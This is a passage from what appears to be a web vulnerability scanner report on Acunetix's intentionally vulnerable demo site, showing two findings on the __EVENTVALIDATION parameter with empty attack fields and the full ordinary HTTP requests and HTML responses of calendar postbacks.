daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1147 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,147 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8291&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgCAyeYaldoIZGRkOm8Q2UdXUtUhApUPGG5g%2FO9Gj34%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLktuFIAu2JnvwLAseQjP4OAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268DAr%2BTz8IMAr%2BTz8IMApC62esPApC62esPApC6zY4HApC6zY4HApC64SUCkLrhJQKQupX4CQKQupX4CQKQuomfAQKQuomfAQKQur2yCgKQur2yCgKQutHWAwKQutHWAwKQusXtDAKQusXtDAKQurnVCQKQurnVCQKQuq3oAgKQuq3oAgLX2eyeBwLX2eyeBwLX2YA1AtfZgDUC19m0yAkC19m0yAkC19mo7wIC19mo7wIC19ncgwoC19ncgwoC19nwpgMC19nwpgMC19nk%2FQwC19nk%2FQwC19mYkAQC19mYkAQC19nM%2BQIC19nM%2BQIC19ngnAoC19ngnAoCqODyhQ0CqODyhQ0CqODm2AYCqODm2AYCqOCa%2Fw8CqOCa%2Fw8CqOCOkgcCqOCOkgcCqOCiKQKo4KIpAqjg1s0JAqjg1s0JAqjgyuACAqjgyuACQlJhOzDz%2FujZ0nuJe8t5BKSysKM%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:23:33 GMT Content-Length: 12635
Response Body - size: 12,635 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgCAyeYaldoIZGRkOm8Q2UdXUtUhApUPGG5g/O9Gj34=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLktuFIAu2JnvwLAseQjP4OAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268DAr+Tz8IMAr+Tz8IMApC62esPApC62esPApC6zY4HApC6zY4HApC64SUCkLrhJQKQupX4CQKQupX4CQKQuomfAQKQuomfAQKQur2yCgKQur2yCgKQutHWAwKQutHWAwKQusXtDAKQusXtDAKQurnVCQKQurnVCQKQuq3oAgKQuq3oAgLX2eyeBwLX2eyeBwLX2YA1AtfZgDUC19m0yAkC19m0yAkC19mo7wIC19mo7wIC19ncgwoC19ncgwoC19nwpgMC19nwpgMC19nk/QwC19nk/QwC19mYkAQC19mYkAQC19nM+QIC19nM+QIC19ngnAoC19ngnAoCqODyhQ0CqODyhQ0CqODm2AYCqODm2AYCqOCa/w8CqOCa/w8CqOCOkgcCqOCOkgcCqOCiKQKo4KIpAqjg1s0JAqjg1s0JAqjgyuACAqjgyuACQlJhOzDz/ujZ0nuJe8t5BKSysKM=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">September 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8289')" style="color:Black" title="September 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8290')" style="color:Black" title="September 12">12</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8291')" style="color:White" title="September 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8292')" style="color:Black" title="September 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8293')" style="color:Black" title="September 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8294')" style="color:Black" title="September 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8295')" style="color:Black" title="September 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8296')" style="color:Black" title="September 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8297')" style="color:Black" title="September 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8298')" style="color:Black" title="September 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8299')" style="color:Black" title="September 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8300')" style="color:Black" title="September 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8301')" style="color:Black" title="September 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8302')" style="color:Black" title="September 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1181 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,181 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8577&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA%2FhzGedsIHgJTRBYBBgAA7kjYddsIZGRkKLiu3RLAOEJLhPgEcja%2FXs2AOuI%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLkxcy5BgKqztTQBQKM1crSCAKK%2Bb%2FgBQKK%2Bb%2FgBQKK%2BdOEDQKK%2BdOEDQKK%2BYfsCwKK%2BYfsCwKK%2BbuDAwKK%2BbuDAwK%2Fk%2BfECQK%2Fk%2BfECQK%2Fk5ubAQK%2Fk5ubAQK%2Fk4%2B%2BCgK%2Fk4%2B%2BCgK%2Fk6PVAwK%2Fk6PVAwK%2Fk9fpDAK%2Fk9fpDAK%2Fk8uMBAK%2Fk8uMBAK%2Fk%2F%2BjDQK%2Fk%2F%2BjDQK%2Fk5PGBgK%2Fk5PGBgK%2Fk8evAwK%2Fk8evAwK%2Fk%2FvCDAK%2Fk%2FvCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB%2BAkCkLqB%2BAkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ%2FKYDAtfZ%2FKYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ%2BPkCAtfZ%2BPkCAtfZ7JwKAtfZ7JwKAqjg%2FoUNAqjg%2FoUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCr9e4gMx%2FjZH1iHMoVlUH6PAM7%2FE
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:59:46 GMT Content-Length: 12461
Response Body - size: 12,461 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA/hzGedsIHgJTRBYBBgAA7kjYddsIZGRkKLiu3RLAOEJLhPgEcja/Xs2AOuI=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLkxcy5BgKqztTQBQKM1crSCAKK+b/gBQKK+b/gBQKK+dOEDQKK+dOEDQKK+YfsCwKK+YfsCwKK+buDAwKK+buDAwK/k+fECQK/k+fECQK/k5ubAQK/k5ubAQK/k4++CgK/k4++CgK/k6PVAwK/k6PVAwK/k9fpDAK/k9fpDAK/k8uMBAK/k8uMBAK/k/+jDQK/k/+jDQK/k5PGBgK/k5PGBgK/k8evAwK/k8evAwK/k/vCDAK/k/vCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB+AkCkLqB+AkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ/KYDAtfZ/KYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ+PkCAtfZ+PkCAtfZ7JwKAtfZ7JwKAqjg/oUNAqjg/oUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCr9e4gMx/jZH1iHMoVlUH6PAM7/E" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8613')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:White" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8590')" style="color:Black" title="July 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8591')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8592')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8593')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8594')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8595')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8596')" style="color:Black" title="July 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8597')" style="color:Black" title="July 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8598')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8599')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8600')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8601')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8602')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8603')" style="color:Black" title="July 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8604')" style="color:Black" title="July 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8605')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8606')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8607')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8608')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8609')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8610')" style="color:Black" title="July 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links 